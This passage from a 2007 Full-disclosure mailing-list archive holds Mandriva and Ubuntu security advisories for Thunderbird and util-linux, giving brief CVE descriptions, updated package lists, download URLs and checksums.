243d8bd877182cd2b5c9798c3292c8ea corporate/3.0/i586/mozilla-thunderbird-eu-1.5.0.10-0.2.C30mdk.i586.rpm 46e47815daa20c787fcbee19d5fa4ad4 corporate/3.0/i586/mozilla-thunderbird-fi-1.5.0.10-0.2.C30mdk.i586.rpm 287f8330f6deeaae3c2cde9b1e424a33 corporate/3.0/i586/mozilla-thunderbird-fr-1.5.0.10-0.2.C30mdk.i586.rpm 81c5be7b47258fc73fe8c48059ba8e03 corporate/3.0/i586/mozilla-thunderbird-ga-1.5.0.10-0.2.C30mdk.i586.rpm 6f6e120e62da08046de143b70b0187ed corporate/3.0/i586/mozilla-thunderbird-gu_IN-1.5.0.10-0.2.C30mdk.i586.rpm cfb5bc55c6a972cbbb1bf9c6394eb86e corporate/3.0/i586/mozilla-thunderbird-he-1.5.0.10-0.2.C30mdk.i586.rpm 40a63ce766b306e6c6423ba8e054f887 corporate/3.0/i586/mozilla-thunderbird-hu-1.5.0.10-0.2.C30mdk.i586.rpm 00f1bff4f2267308a8507ff6e4f1e01b corporate/3.0/i586/mozilla-thunderbird-it-1.5.0.10-0.2.C30mdk.i586.rpm 7980f6f2e95ecc319ba6e430148ff92f corporate/3.0/i586/mozilla-thunderbird-ja-1.5.0.10-0.2.C30mdk.i586.rpm 7e52bedf5090c6796e609c40e423f81a corporate/3.0/i586/mozilla-thunderbird-ko-1.5.0.10-0.2.C30mdk.i586.rpm c41b9ca858a5fbe18c1ae56a5cff9f14 corporate/3.0/i586/mozilla-thunderbird-lt-1.5.0.10-0.2.C30mdk.i586.rpm a50d2413edc446a4349d87122078c4a8 corporate/3.0/i586/mozilla-thunderbird-mk-1.5.0.10-0.2.C30mdk.i586.rpm af7a53c091209317b7b1abbe2abe6636 corporate/3.0/i586/mozilla-thunderbird-nb-1.5.0.10-0.2.C30mdk.i586.rpm 74e3a755c9e4ab6c294a6e2ae85ed0d5 corporate/3.0/i586/mozilla-thunderbird-nl-1.5.0.10-0.2.C30mdk.i586.rpm f4fae58ef25d999f9632f759738af6d6 corporate/3.0/i586/mozilla-thunderbird-pa_IN-1.5.0.10-0.2.C30mdk.i586.rpm 6777dddf183449a404fc540d5dad43ab corporate/3.0/i586/mozilla-thunderbird-pl-1.5.0.10-0.2.C30mdk.i586.rpm f9033076e7a749442e298ed4762f968d corporate/3.0/i586/mozilla-thunderbird-pt_BR-1.5.0.10-0.2.C30mdk.i586.rpm 995841dbfb17603b4c234f7d69b1399b corporate/3.0/i586/mozilla-thunderbird-ru-1.5.0.10-0.2.C30mdk.i586.rpm 8c56e2c3371e739cce5c89347e957634 corporate/3.0/i586/mozilla-thunderbird-sk-1.5.0.10-0.2.C30mdk.i586.rpm c70256acde122a3b7e90d3880794184d corporate/3.0/i586/mozilla-thunderbird-sl-1.5.0.10-0.2.C30mdk.i586.rpm 69b2d18c13d08b72dbd19030613c6c67 corporate/3.0/i586/mozilla-thunderbird-sv-1.5.0.10-0.2.C30mdk.i586.rpm 88fc12e9755a9aeeb00c73aa577e6e1d corporate/3.0/i586/mozilla-thunderbird-tr-1.5.0.10-0.2.C30mdk.i586.rpm bee92023af6580cc56a180d6a682b6da corporate/3.0/i586/mozilla-thunderbird-zh_CN-1.5.0.10-0.2.C30mdk.i586.rpm 68dd134b7e34fad18bde90acebeed2b4 corporate/3.0/i586/nsinstall-1.5.0.10-0.1.C30mdk.i586.rpm 10a933ad4dcbab9cd9b3b916b96f75ed corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.src.rpm 5ffe58e04f606087bc3ad2ec3432df3f corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-0.2.C30mdk.src.rpm 15da7339a6a20307e6fc7d97da5f88a3 corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-0.2.C30mdk.src.rpm Corporate 3.0/X86_64: 5eed6a8b65cfa110c4d461b081ab5e1d corporate/3.0/x86_64/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.x86_64.rpm 9ae7a4f6fd7e0bd03ece0bebc324d18e corporate/3.0/x86_64/mozilla-thunderbird-bg-1.5.0.10-0.2.C30mdk.x86_64.rpm 7501f1efc072aeabbd562490375b520d corporate/3.0/x86_64/mozilla-thunderbird-ca-1.5.0.10-0.2.C30mdk.x86_64.rpm 5966823049a0fd1a3adfd22c95fedeaa corporate/3.0/x86_64/mozilla-thunderbird-cs-1.5.0.10-0.2.C30mdk.x86_64.rpm 8e8cf13ddbf56959df0773b6504d610c corporate/3.0/x86_64/mozilla-thunderbird-da-1.5.0.10-0.2.C30mdk.x86_64.rpm 0e1710efb25ccef6937c266afc7e8ff0 corporate/3.0/x86_64/mozilla-thunderbird-de-1.5.0.10-0.2.C30mdk.x86_64.rpm 156f565fa8b48f113f272965fd033017 corporate/3.0/x86_64/mozilla-thunderbird-devel-1.5.0.10-0.1.C30mdk.x86_64.rpm d84f81185525ef67567ffcd5f736bbc4 corporate/3.0/x86_64/mozilla-thunderbird-el-1.5.0.10-0.2.C30mdk.x86_64.rpm 465bd954fbd21b09cd4adc5abbac478d corporate/3.0/x86_64/mozilla-thunderbird-enigmail-1.5.0.10-0.1.C30mdk.x86_64.rpm b78668237055e06c2a70061e89fe2361 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ca-1.5.0.10-0.2.C30mdk.x86_64.rpm df32ffe1810ba059cd2469c94e0385be corporate/3.0/x86_64/mozilla-thunderbird-enigmail-cs-1.5.0.10-0.2.C30mdk.x86_64.rpm 1800a78540308a2dadf8e213407543eb corporate/3.0/x86_64/mozilla-thunderbird-enigmail-de-1.5.0.10-0.2.C30mdk.x86_64.rpm 0f67358b87f54539cf100638fa2b335e corporate/3.0/x86_64/mozilla-thunderbird-enigmail-el-1.5.0.10-0.2.C30mdk.x86_64.rpm f50d554baf7fe27c0d5f8126b4de8c9f corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es-1.5.0.10-0.2.C30mdk.x86_64.rpm 63c3652e6f4f7fa396e3efe20bf4a037 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-es_AR-1.5.0.10-0.2.C30mdk.x86_64.rpm 4bc507370093f469c58b2dd4e97e1775 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fi-1.5.0.10-0.2.C30mdk.x86_64.rpm 247261877471e9b863f9741bc74bebe0 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-fr-1.5.0.10-0.2.C30mdk.x86_64.rpm 732cb2553bf8f3385c2eb570c77e0242 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-hu-1.5.0.10-0.2.C30mdk.x86_64.rpm 46eeee865e6d820c8c91d41eca5808da corporate/3.0/x86_64/mozilla-thunderbird-enigmail-it-1.5.0.10-0.2.C30mdk.x86_64.rpm 59e5fa6d80e8b69f1eec08257da2d17e corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ja-1.5.0.10-0.2.C30mdk.x86_64.rpm a51eb9656d6b247a4b245dd61ae73771 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nb-1.5.0.10-0.2.C30mdk.x86_64.rpm 81db232cb316d44e42259521113be1fa corporate/3.0/x86_64/mozilla-thunderbird-enigmail-nl-1.5.0.10-0.2.C30mdk.x86_64.rpm e6e6b8467e504656f4b920e9e0e20387 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pl-1.5.0.10-0.2.C30mdk.x86_64.rpm 0e7abd2324378c57a1cd53d365b147ff corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt-1.5.0.10-0.2.C30mdk.x86_64.rpm 8a0329b5ff9b807237db590fb6c6a40d corporate/3.0/x86_64/mozilla-thunderbird-enigmail-pt_BR-1.5.0.10-0.2.C30mdk.x86_64.rpm aea2573674a2d191f795b39e4eee5c08 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-ru-1.5.0.10-0.2.C30mdk.x86_64.rpm 4c9d0fd467b65a41e2072cbe4662af42 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sk-1.5.0.10-0.2.C30mdk.x86_64.rpm 6cc5418aeb8413451d8d5d5168b1d72d corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sl-1.5.0.10-0.2.C30mdk.x86_64.rpm 7a33a0bf0aa1bd226ecc514ceb76a9e5 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-sv-1.5.0.10-0.2.C30mdk.x86_64.rpm 052c6c823f5520dfa53bb12ec692d077 corporate/3.0/x86_64/mozilla-thunderbird-enigmail-zh_CN-1.5.0.10-0.2.C30mdk.x86_64.rpm d86e76149521a388c84463ac1066138a corporate/3.0/x86_64/mozilla-thunderbird-es-1.5.0.10-0.2.C30mdk.x86_64.rpm 9fba0169db5d29f34ba9f57235ad9123 corporate/3.0/x86_64/mozilla-thunderbird-es_AR-1.5.0.10-0.2.C30mdk.x86_64.rpm 32842ba8d80d6c8d404f6df8a979ef28 corporate/3.0/x86_64/mozilla-thunderbird-eu-1.5.0.10-0.2.C30mdk.x86_64.rpm c29de851558ca0ca4d968b90b3ae9bdd corporate/3.0/x86_64/mozilla-thunderbird-fi-1.5.0.10-0.2.C30mdk.x86_64.rpm 3013b75ff81335ba8ee4e2b4924c82d0 corporate/3.0/x86_64/mozilla-thunderbird-fr-1.5.0.10-0.2.C30mdk.x86_64.rpm 12aeb30efd8bc517eb7d94a6a4d57b33 corporate/3.0/x86_64/mozilla-thunderbird-ga-1.5.0.10-0.2.C30mdk.x86_64.rpm c151fbd8060d857b640559fd36003550 corporate/3.0/x86_64/mozilla-thunderbird-gu_IN-1.5.0.10-0.2.C30mdk.x86_64.rpm 49a4aacc21f79c4e2b39b0371467261a corporate/3.0/x86_64/mozilla-thunderbird-he-1.5.0.10-0.2.C30mdk.x86_64.rpm d79b8c98d3f811fd1955454c1f8d0516 corporate/3.0/x86_64/mozilla-thunderbird-hu-1.5.0.10-0.2.C30mdk.x86_64.rpm af6e5c2e9b2e8dccbf85d87e21069413 corporate/3.0/x86_64/mozilla-thunderbird-it-1.5.0.10-0.2.C30mdk.x86_64.rpm ff8008a1e083da73d4b6ea803e973fc4 corporate/3.0/x86_64/mozilla-thunderbird-ja-1.5.0.10-0.2.C30mdk.x86_64.rpm 43a153102a15d16fd4e26e56afca6b65 corporate/3.0/x86_64/mozilla-thunderbird-ko-1.5.0.10-0.2.C30mdk.x86_64.rpm 93f6aa27792c0d384318b6d6c84f5257 corporate/3.0/x86_64/mozilla-thunderbird-lt-1.5.0.10-0.2.C30mdk.x86_64.rpm 91db2a3a3cc6446466a1b1b4414a248d corporate/3.0/x86_64/mozilla-thunderbird-mk-1.5.0.10-0.2.C30mdk.x86_64.rpm a41bdb309299da5fdfac1e76a1833854 corporate/3.0/x86_64/mozilla-thunderbird-nb-1.5.0.10-0.2.C30mdk.x86_64.rpm 6c53fafaaa14b2defd0da3cab8074c25 corporate/3.0/x86_64/mozilla-thunderbird-nl-1.5.0.10-0.2.C30mdk.x86_64.rpm af27daa8b7f3c4facec85afde1353035 corporate/3.0/x86_64/mozilla-thunderbird-pa_IN-1.5.0.10-0.2.C30mdk.x86_64.rpm bd6bd071b7991ebe90fb4b12b16cc61f corporate/3.0/x86_64/mozilla-thunderbird-pl-1.5.0.10-0.2.C30mdk.x86_64.rpm 50fac75c2e3ae2cd790211ea31722674 corporate/3.0/x86_64/mozilla-thunderbird-pt_BR-1.5.0.10-0.2.C30mdk.x86_64.rpm f712eaa7ff8096b6bd862dd644703264 corporate/3.0/x86_64/mozilla-thunderbird-ru-1.5.0.10-0.2.C30mdk.x86_64.rpm 28572a795636993bcffec7914e329990 corporate/3.0/x86_64/mozilla-thunderbird-sk-1.5.0.10-0.2.C30mdk.x86_64.rpm b2eafda9c8cbfadf49eb9ad5225fca2b corporate/3.0/x86_64/mozilla-thunderbird-sl-1.5.0.10-0.2.C30mdk.x86_64.rpm 5dbd5e6737c51080ba2ea0bbf78aeb04 corporate/3.0/x86_64/mozilla-thunderbird-sv-1.5.0.10-0.2.C30mdk.x86_64.rpm 1ac54705a59fa3c3bc2cb1de04c60072 corporate/3.0/x86_64/mozilla-thunderbird-tr-1.5.0.10-0.2.C30mdk.x86_64.rpm e17f8d89057b82da95e337acd2c50343 corporate/3.0/x86_64/mozilla-thunderbird-zh_CN-1.5.0.10-0.2.C30mdk.x86_64.rpm 1a907acf823e7a13dbc254cef0c73d92 corporate/3.0/x86_64/nsinstall-1.5.0.10-0.1.C30mdk.x86_64.rpm 10a933ad4dcbab9cd9b3b916b96f75ed corporate/3.0/SRPMS/mozilla-thunderbird-1.5.0.10-0.1.C30mdk.src.rpm 5ffe58e04f606087bc3ad2ec3432df3f corporate/3.0/SRPMS/mozilla-thunderbird-enigmail-l10n-1.5.0.10-0.2.C30mdk.src.rpm 15da7339a6a20307e6fc7d97da5f88a3 corporate/3.0/SRPMS/mozilla-thunderbird-l10n-1.5.0.10-0.2.C30mdk.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing: gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98 You can view other update advisories for Mandriva Linux at: http://www.mandriva.com/security/advisories If you want to report vulnerabilities, please contact security_(at)_mandriva.com _______________________________________________________________________ Type Bits/KeyID Date User ID pub 1024D/22458A98 2000-07-10 Mandriva Security Team -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.6 (GNU/Linux) iD8DBQFF7fDLmqjQ0CJFipgRAnRNAJ9YQdzHG+LBg+IPlmk0I7ChsRTSAgCgjoeQ KgRWeu9OJp6bRpJ2GYvJfS0= =E3ov -----END PGP SIGNATURE----- From kees at ubuntu.com Wed Mar 7 01:54:41 2007 From: kees at ubuntu.com (Kees Cook) Date: Tue, 6 Mar 2007 17:54:41 -0800 Subject: [Full-disclosure] [USN-431-1] Thunderbird vulnerabilities Message-ID: <20070307015441.GP9621@outflux.net> =========================================================== Ubuntu Security Notice USN-431-1 March 07, 2007 mozilla-thunderbird vulnerabilities CVE-2007-0008, CVE-2007-0009, CVE-2007-0775, CVE-2007-0776, CVE-2007-0777 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 5.10 Ubuntu 6.06 LTS Ubuntu 6.10 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 5.10: mozilla-thunderbird 1.5.0.10-0ubuntu0.5.10 Ubuntu 6.06 LTS: mozilla-thunderbird 1.5.0.10-0ubuntu0.6.06 Ubuntu 6.10: mozilla-thunderbird 1.5.0.10-0ubuntu0.6.10 After a standard system upgrade you need to restart Thunderbird to effect the necessary changes. Details follow: The SSLv2 protocol support in the NSS library did not sufficiently check the validity of public keys presented with a SSL certificate. A malicious SSL web site using SSLv2 could potentially exploit this to execute arbitrary code with the user's privileges. (CVE-2007-0008) The SSLv2 protocol support in the NSS library did not sufficiently verify the validity of client master keys presented in an SSL client certificate. A remote attacker could exploit this to execute arbitrary code in a server application that uses the NSS library. (CVE-2007-0009) Various flaws have been reported that could allow an attacker to execute arbitrary code with user privileges by tricking the user into opening a malicious web page. (CVE-2007-0775, CVE-2007-0776, CVE-2007-0777) Updated packages for Ubuntu 5.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10.diff.gz Size/MD5: 451558 9201ce342ac44e7457f9effe0b2260f1 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10.dsc Size/MD5: 963 096c2f8f7595b063cdb57734aee49fc7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10.orig.tar.gz Size/MD5: 36077004 6c3d75d0fb4d1382bb64fb0808eab840 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_amd64.deb Size/MD5: 3530774 87d19a325390947583e48a0acc1c430e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_amd64.deb Size/MD5: 190690 8b94c996f15698e3e4e5f10abeba99f9 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_amd64.deb Size/MD5: 55902 8df7e608027f16e4dbc52c6df70a935c http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_amd64.deb Size/MD5: 12060510 bffb0df58665aa9e0bda36e8d2ab0dcf i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_i386.deb Size/MD5: 3521898 735c894ec6a51acde89e9419537a1af0 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_i386.deb Size/MD5: 184074 edcad564676152a81a4b03009782fa0f http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_i386.deb Size/MD5: 51530 fbacc5e9bdb9fb69e054296da579db55 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_i386.deb Size/MD5: 10348302 448cf552030f1e113ef6eecd3db47ec0 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 3527478 a62c8ea3d17e342c697fba213701fac9 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 187408 6b53d9f03e9776f35f55a44b11324219 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 55096 6715a4ba6cce73da08932aa035f9f1f6 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_powerpc.deb Size/MD5: 11592470 4fde80cd428cf5f962a5fa21a1100c04 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 3523640 f1950b4c50d02a43f6ab02618c49ce5e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 184856 ff96fb8e4ac2fbe594199ad554fa14ad http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 52986 12026f7161124993d7ce057fb653eebb http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.5.10_sparc.deb Size/MD5: 10831064 1d98f8ff2cca32fc5efdccf6f45d041b Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06.diff.gz Size/MD5: 454934 3634b0418aa5cbee5e0c194dece32b45 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06.dsc Size/MD5: 963 ce0d4a0e906b98b47379417e02acf9d9 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 3534786 4048c5389518c3be184a6419b0a92dd3 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 194174 8780af0825be29bfbb9e4c696d973ce0 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 59408 7cb37722b78dfa50bb6e46ab92b53ccc http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_amd64.deb Size/MD5: 12070202 f45fd5e505a0536659947aca0de26f8b i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 3527078 fc76f9a36e74f02185a97cd5740c7de7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 187538 50b6efcce4b41288152226f3dd611db7 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 54922 d2e14f478a41db1b1aa53bbac4abba4e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_i386.deb Size/MD5: 10347054 8422c679127103ee6ea36ce4e9f2ceb5 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 3532870 8665536250fad703a6e4e6ff181b486e http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 190880 34d32b90b85048df075b64570bed5d74 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 58538 512fe71392f887c32b3f5d096abe3ac4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_powerpc.deb Size/MD5: 11624320 2bff41c1ed67e361243b12dc9bc8cf68 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 3529076 2c3f05b9709a35fe8a04cb9635ded807 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 188328 09a45d676c00517e501371978a44ea88 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 56414 cf685a4cca2d52a949bb4b6ae5644ba4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.06_sparc.deb Size/MD5: 10818756 e2c84d36ac95f59d55e61a165d036cf4 Updated packages for Ubuntu 6.10: Source archives: http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10.diff.gz Size/MD5: 455368 b1b05ec9b0524d9837f9dbc1886ba5db http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10.dsc Size/MD5: 963 7d3d9373365c63f81f1893cf1c0343e6 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 3534530 b91a4f3fa51ce679b526b603c53f606c http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 194290 f1316eedba06e1fa05b61bd40661447c http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 59412 a8d368db2641ad759235f63b60adca94 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_amd64.deb Size/MD5: 12068840 097951e9a5ab8c54a9beff73fe38feff i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 3530892 4ffa7353a111fadee3aa3971529a026d http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 188958 bf234cf79421a6fff37f1c10a81e4c42 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 56050 ec52c524dacf263fd93b4eb8c88e1a77 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_i386.deb Size/MD5: 10804696 67b115670c9a231cbd643d8eb98e3207 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 3532760 ddbf679b2c92f5dc8bff86f96f87dfe2 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 191388 f1cf1a7112e492784fa822d82d8c70f4 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 59058 fe7ae7579b6c325fd5276fdd7085caa1 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_powerpc.deb Size/MD5: 11753272 51eb235e10f5ce40e75d9eceb1a1a460 sparc architecture (Sun SPARC/UltraSPARC) http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-dev_1.5.0.10-0ubuntu0.6.10_sparc.deb Size/MD5: 3529194 e20b5525b8119e82c6887a363b652c12 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-inspector_1.5.0.10-0ubuntu0.6.10_sparc.deb Size/MD5: 188778 f97c647566c1ade50a2d838dd5a0f906 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird-typeaheadfind_1.5.0.10-0ubuntu0.6.10_sparc.deb Size/MD5: 56468 bea9f315b787f5841932a27c61c4ed26 http://security.ubuntu.com/ubuntu/pool/main/m/mozilla-thunderbird/mozilla-thunderbird_1.5.0.10-0ubuntu0.6.10_sparc.deb Size/MD5: 11019700 0bd22175edc692013128f0b278832027 -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 189 bytes Desc: Digital signature Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/f91e5125/attachment.bin From security at mandriva.com Wed Mar 7 02:41:43 2007 From: security at mandriva.com (security at mandriva.com) Date: Tue, 06 Mar 2007 19:41:43 -0700 Subject: [Full-disclosure] [ MDKSA-2007:053 ] - Updated util-linux packages address umount crash issue Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDKSA-2007:053 http://www.mandriva.com/security/ _______________________________________________________________________ Package : util-linux Date : March 6, 2007 Affected: 2006.0, 2007.0, Corporate 4.0 _______________________________________________________________________ Problem Description: Umount allows local users to trigger a NULL dereference and application crash by invoking the program with a pathname for a USB pen drive that was mounted and then physically removed, which might allow the users to obtain sensitive information, including core file contents. Updated packages have been patched to address this issue. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0822 _______________________________________________________________________ Updated Packages: Mandriva Linux 2006.0: 4cebdff08516af8c2b0699fd653e4a67 2006.0/i586/losetup-2.12q-7.1.20060mdk.i586.rpm 5b313c5f38551e902189d2137ca5ba90 2006.0/i586/mount-2.12q-7.1.20060mdk.i586.rpm a64f898f2a35c4ebe8c7665aa9ac04b7 2006.0/i586/util-linux-2.12q-7.1.20060mdk.i586.rpm 4181f6388cffa1f5d0c134a0e794ea71 2006.0/SRPMS/util-linux-2.12q-7.1.20060mdk.src.rpm Mandriva Linux 2006.0/X86_64: 3011f9fab70a764f603f2986f866fbf1 2006.0/x86_64/losetup-2.12q-7.1.20060mdk.x86_64.rpm bf21334b7e55bad39b4443c2662e2763 2006.0/x86_64/mount-2.12q-7.1.20060mdk.x86_64.rpm 